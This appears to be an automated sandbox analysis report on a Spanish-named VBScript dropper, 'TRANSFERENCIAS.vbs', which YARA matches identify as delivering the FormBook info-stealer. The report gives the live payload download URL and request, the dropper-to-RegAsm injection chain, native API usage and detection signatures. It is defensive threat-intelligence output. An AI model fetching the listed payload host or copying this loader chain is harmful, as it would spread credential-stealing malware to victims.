Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brd
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr	String found in binary or memory: https://transfer.adttemp.com.br/Io2SD/sirdeeeeee.txt

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042C563 NtClose,	3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC35C0 NtCreateMutant,LdrInitializeThunk,	3_2_02CC35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_02CC2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_02CC2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4340 NtSetContextThread,	3_2_02CC4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3090 NtSetValueKey,	3_2_02CC3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3010 NtOpenDirectoryObject,	3_2_02CC3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4650 NtSuspendThread,	3_2_02CC4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AD0 NtReadFile,	3_2_02CC2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AF0 NtWriteFile,	3_2_02CC2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AB0 NtWaitForSingleObject,	3_2_02CC2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BE0 NtQueryValueKey,	3_2_02CC2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BF0 NtAllocateVirtualMemory,	3_2_02CC2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B80 NtQueryInformationFile,	3_2_02CC2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BA0 NtEnumerateValueKey,	3_2_02CC2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B60 NtClose,	3_2_02CC2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC39B0 NtGetContextThread,	3_2_02CC39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EE0 NtQueueApcThread,	3_2_02CC2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E80 NtReadVirtualMemory,	3_2_02CC2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EA0 NtAdjustPrivilegesToken,	3_2_02CC2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E30 NtWriteVirtualMemory,	3_2_02CC2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FE0 NtCreateFile,	3_2_02CC2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F90 NtProtectVirtualMemory,	3_2_02CC2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FA0 NtQuerySection,	3_2_02CC2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FB0 NtResumeThread,	3_2_02CC2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F60 NtCreateProcessEx,	3_2_02CC2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F30 NtCreateSection,	3_2_02CC2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CC0 NtQueryVirtualMemory,	3_2_02CC2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CF0 NtOpenProcess,	3_2_02CC2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CA0 NtQueryInformationToken,	3_2_02CC2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C60 NtCreateKey,	3_2_02CC2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C00 NtQueryInformationProcess,	3_2_02CC2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DD0 NtDelayExecution,	3_2_02CC2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DB0 NtEnumerateKey,	3_2_02CC2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D70 NtOpenThread,	3_2_02CC3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D00 NtSetInformationFile,	3_2_02CC2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D10 NtOpenProcessToken,	3_2_02CC3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D10 NtMapViewOfSection,	3_2_02CC2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D30 NtUnmapViewOfSection,	3_2_02CC2D30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA3558	2_2_02FA3558
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA1930	2_2_02FA1930
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA354B	2_2_02FA354B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402350	3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB83	3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FCFB	3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404486	3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FD03	3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402E60	3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166B3	3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FF23	3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DFA3	3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D503E6	3_2_02D503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F0CC	3_2_02D3F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F0E0	3_2_02D4F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D470E9	3_2_02D470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D481CC	3_2_02D481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D501AA	3_2_02D501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC516C	3_2_02CC516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B16B	3_2_02D5B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80100	3_2_02C80100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC6E0	3_2_02CAC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F7B0	3_2_02D4F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB4750	3_2_02CB4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3E4F6	3_2_02D3E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D42446	3_2_02D42446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81460	3_2_02C81460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F43F	3_2_02D4F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D50591	3_2_02D50591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2D5B0	3_2_02D2D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47571	3_2_02D47571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90535	3_2_02C90535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3DAC6	3_2_02D3DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8EA80	3_2_02C8EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD5AA0	3_2_02CD5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2DAAC	3_2_02D2DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47A46	3_2_02D47A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FA49	3_2_02D4FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D03A6C	3_2_02D03A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D46BD7	3_2_02D46BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CCDBF9	3_2_02CCDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFB80	3_2_02CAFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4AB40	3_2_02D4AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FB76	3_2_02D4FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C938E0	3_2_02C938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE8F0	3_2_02CBE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C768B8	3_2_02C768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C92840	3_2_02C92840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9A840	3_2_02C9A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD800	3_2_02CFD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C929A0	3_2_02C929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5A9A6	3_2_02D5A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99950	3_2_02C99950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB950	3_2_02CAB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA6962	3_2_02CA6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EEDB	3_2_02D4EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4CE93	3_2_02D4CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA2E90	3_2_02CA2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99EB0	3_2_02C99EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90E59	3_2_02C90E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EE26	3_2_02D4EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82FC8	3_2_02C82FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9CFE0	3_2_02C9CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91F92	3_2_02C91F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FFB1	3_2_02D4FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04F40	3_2_02D04F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FF09	3_2_02D4FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD2F28	3_2_02CD2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0F30	3_2_02CB0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FCF2	3_2_02D4FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80CF2	3_2_02C80CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30CB5	3_2_02D30CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90C00	3_2_02C90C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D09C32	3_2_02D09C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFDC0	3_2_02CAFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8ADE0	3_2_02C8ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA8DBF	3_2_02CA8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93D40	3_2_02C93D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D41D5A	3_2_02D41D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47D73	3_2_02D47D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9AD00	3_2_02C9AD00

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02C7B970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CC5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CD7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02D0F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CFEA12 appears 84 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: TRANSFERENCIAS.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@5/2@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
